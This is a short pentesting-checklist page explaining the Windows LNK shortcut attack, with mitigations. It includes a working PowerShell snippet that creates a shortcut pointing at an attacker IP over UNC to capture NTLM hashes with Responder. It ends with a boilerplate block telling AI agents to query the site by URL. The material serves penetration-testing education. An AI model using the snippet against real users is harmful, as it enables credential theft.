# LNK Attack ### Overview A **LNK file attack** abuses Windows **shortcut (.lnk) files** to execute malicious commands when a user **clicks or previews** what appears to be a legitimate shortcut (e.g., *Invoice.pdf.lnk*). ### Prerequisites 1. User must click or open the shortcut OR browse a directory containing the shortcut. 2. Ability to deliver the LNK file ### Steps 1. Attacker creates a shortcut file and the shortcut points to the attacker's IP. Eg: ```powershell $objShell = New-Object -ComObject WScript.shell $lnk = $objShell.CreateShortcut("C:\test.lnk") $lnk.TargetPath = "\\192.168.138.149\@test.png" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "Test" $lnk.HotKey = "Ctrl+Alt+T" $lnk.Save() ``` 2. User opens the shortcut / opens the directory of the shortcut. 3. Malicious action executes under the user’s context. The connection is made to the attacker where we can capture the NTLM hash using responder. ### Mitigations 1. Disable or Restrict LNK Execution 2. Show File Extensions 3. Harden PowerShell --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/post-compromise-attacks/lnk-attack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.